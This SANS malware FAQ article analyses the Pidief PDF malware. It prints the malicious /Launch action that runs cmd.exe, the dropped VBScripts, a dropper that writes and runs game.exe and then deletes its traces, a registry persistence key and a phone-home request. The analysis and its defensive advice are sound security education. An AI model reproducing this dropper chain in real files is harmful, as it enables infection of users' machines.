Gain Top-Notch InfoSec Skills at SANS Las Vegas 2018. Save $400 thru 12/6.

Malware FAQ


PDF Malware: Pidief

Author: Joel Yonts

The exchange of electronic documents has become a cornerstone of our information age. Whether dealing with corporate users exchanging documents with customers or gamers downloading the latest cheat codes, the consistent need is a document system that can deliver rich content to a wide audience of users. Adobe answered this need in the early 90s with the Portable Document Format (PDF)¹. This document standard supports a wide range of text, multimedia, and dynamic content elements. Additionally, PDF viewers can be found (and normally pre-installed) on all major computing and mobile platforms making it the most popular document format available today.

Without surprise this popularity and adoption has gained the attention of malware authors. For these cybercriminals, the opportunity to deliver malicious code through a document format that exists on all platforms and is critical to both business and home users has an attractive potential. To further elevate this potential, PDF's dynamic content functionally provides a perfect landscape for crafting malicious PDFs (Embedded Script Support, Execute on Open Actions).

This potential was first realized a decade ago when a PDF worm known as Peachy used an embedded Visual Basic script to cause problems for Outlook users. Over the past 10 years much has changed on the malware scene and we have seen several new PDF malware families. Even though motives and payload has changed over this period, the common infection pattern remains the same:

Figure 1: PDF Infection Pattern

¹Portable Document Format (PDF) was released as an open standard in Fall 2008

A Recent Example: Pidief

Pidief is a PDF malware family that was first discovered in late 2007 and continues to evolve and be active in early 2010. Typically delivered via email attachment or an Internet link embedded in email, this malware follows the pattern outlined above. Figure 2 shows a sample email that was used to delivered Pidief in April 2010.

Figure 2: Email Delivery of Pidief PDF

If a user ignored the bad English and opened the attached PDF, a one-page document with the words "Important Information doc.pdf" (Figure 3) would be displayed, along with a Launch File Warning (Figure 4). A determined user clicking "open" in the dialog box would begin the infection process and a flurry of activity would commence behind the scenes. From the user's perspective, there is no visible activity other than a few windows that pop-up and disappear quickly.

Figure 3: PDF Displayed by Malware

Figure 4: PDF Viewer Warning the User of Potential Danger

Pidief Infection Process

From the execution analysis shown above (Figure 4) we see the infection process is based on the PDF launching an external program. Examining the contents of the attached PDF (1dcd4a3f5d05433fcebf88d9138a1966) we can see that the file does contain an "Open Action" object (Table 1) and the contents of that object is an embedded VBScript (Table 2) launched by passing the script to cmd.exe. The script did not contain exploit code, otherwise user interaction (Figure 4) would not be required to initiate the infection process.

TABLE 1: SUSPECT PDF OBJECT
PDFiD 0.0.11 doc.pdf
PDF Header: %PDF-1.1
obj8
endobj8
stream1
endstream1
xref1
trailer1
startxref1
/Page1
/Encrypt0
/ObjStm0
/JS0
/JavaScript0
/AA0
/OpenAction1
/AcroForm0
/JBIG2Decode0
/RichMedia0
/Launch1
/Colors > 2^240
TABLE 2: EMBEDDED "OPEN ACTION"
obj 8 0
Type: /Action
Referencing:
<<
/Type /Action
/S /Launch
/Win
<<
/F (cmd.exe)
/P (/c echo Set
fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo Set
f=fso.OpenTextFile("doc.pdf", 1, True) >>
script.vbs && echo pf=f.ReadAll >>
script.vbs && echo s=InStr(pf,"'SS") >>
script.vbs && echo e=InStr(pf,"'EE") >>
script.vbs && echo s=Mid(pf,s,e-s) >>
script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2,
True) >> script.vbs && echo s =
Replace(s,"%","") >> script.vbs && echo
z.Write(s) >> script.vbs && script.vbs &&
batscript.vbs
Click the "open" button to view this document:)
>>
>>
<<
/Type /Action
/S /Launch
/Win /F (cmd.exe)
/P (
/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True)

During execution, the Visual Basic script listed above writes a new Visual Basic script called script.vbs to the current working directory and then executes it.

TABLE 3: DROPPED SCRIPT.VBS SCRIPT
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True)
s = Replace(s,"%","")
z.Write(s)

script.vbs opens the original PDF and extracts a very large secondary script called batscript.vbs. This script has two main parts. The first is a large embedded object encoded and stored in a local VB variable.

TABLE 4: OBJECT EMBEDDED IN BATSCRIPT.VBS
b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),c(004),
c(000),c(000),c(000) ,c(255),c(255),c(000),c(000),c(184),c(000),c(000), c(000),c(000),c(000),c(000),c(000),c(064),c(000),c(000),c(000),c(000),
c(000),c(000),c(000),c(000),c(000),c(000),c(000),c(000),c(000),c(000),
c(000),c(000),c(000)
<<< 248,111 characters omitted for brevity >>>

The second part of batscript.vbs is a dropper function that takes the data stored in the local VB variable and writes it to disk under the name game.exe. The new file is executed after creation and the remaining lines of batscript.vbs deletes the files dropped during the infection process.

TABLE 5: BATSCRIPT.VBS DROPPER FUNCTIONALITY
...
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("game.exe", 2, True)
For i = 0 To 35328
f.write(b(i))
Next
f.close()
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "cmd.exe /c game.exe"
WScript.Sleep 3000
Set f = FSO.GetFile("game.exe")
f.Delete
Set f = FSO.GetFile("batscript.vbs")
f.Delete
Set f = FSO.GetFile("script.vbs")
f.Delete

Examination of the file operations associated with the infection process reveals game.exe leverages system services to install a new copy of itself in c:\program files\Microsoft Common\svchost.exe.

TABLE 6: FILE OPERATIONS ASSOCIATED WITH THE INFECTION PROCESS
ACTIVITYPROCESSTARGET
"Write","cmd.exe","C:\samples\script.vbs"
"Write","wscript.exe","C:\samples\batscript.vbs"
"Write","wscript.exe","C:\samples\game.exe"
"Write","svchost.exe","C:\Program Files\Microsoft Common\svchost.exe"
"Delete","wscript.exe","C:\samples\game.exe"
"Delete","wscript.exe","C:\samples\batscript.vbs"
"Delete","wscript.exe","C:\samples\script.vbs"
----
$ md5sum game.exe svchost.exe
c3a70f6177a95971f9b2f9eec338cfe2 game.exe
c3a70f6177a95971f9b2f9eec338cfe2 svchost.exe

To persist the infection, an Image File Execution registry key is set to launch the newly installed malware each time explorer.exe is executed.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution
Options\explorer.exe\Debugger: "C:\Program Files\Microsoft
Common\svchost.exe
"

Finally, we see "phone home" behavior initiated by the malicious svchost.exe process.

TABLE 7: NETWORK ACTIVITY - PHONE HOME
TCP_HIT/200 43 GET hxxp://190.xxx.xxx.xxx/lde/ld.php?v=1&rs=76487-641-0439075-23421273557024&n=1&uid=1 - NONE/- text/html
GET /lde/ld.php?v=1&rs=76487-641-0439075-23421273557024&n=1&uid=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: xxxxxxxxxxx.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 28 Apr 2010 22:00:01 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,User-Agent
Content-Length: 43
602|76487-641-0439075-23421273557024
w
608

Summary

As seen in the Pidief example, PDF malware often uses dynamic content in conjunction with a multi-stage infection process that spans multiple layers of obfuscation, files, and process. The primary goal behind this complicated infection process is subversion. These techniques have aided malicious PDFs in the quest to successfully evade AV detection for years. When we compare the original VBScript techniques utilized by the Peachy worm (2001) with our present day Pidief example, it is easy to see these techniques persists simply because they work.

Malware Defense

A good first line of defense against PDF malware is security awareness. If users are trained to avoid opening attachments from unsolicited emails especially when warning dialogs are displayed, the social engineering infection vector is severely limited. Trained users combined with reputation based network filtering and locally installed Anti-Malware solutions rounds out a good defense against PDF Malware and the Pidief malware family. An additional layer of protection may be added by implementing technical controls that prevent the execution of external programs by PDF viewers.

Additional Material

Below is an abbreviated list of information sources regarding PDF Malware and the Pidief malware family.

  1. This Adobe Acrobat worm is a real peach
    ZDNet - August 2001
  2. More Adobe Acrobat, Reader PDF Problems
    PCWorld - October 2007
  3. TrojanDropper:Win32/Pidrop.A
    Microsoft - April 2010
  4. PDF malware analysis
    SANS Institute - December 2009
  5. Didier Stevens PDF Tools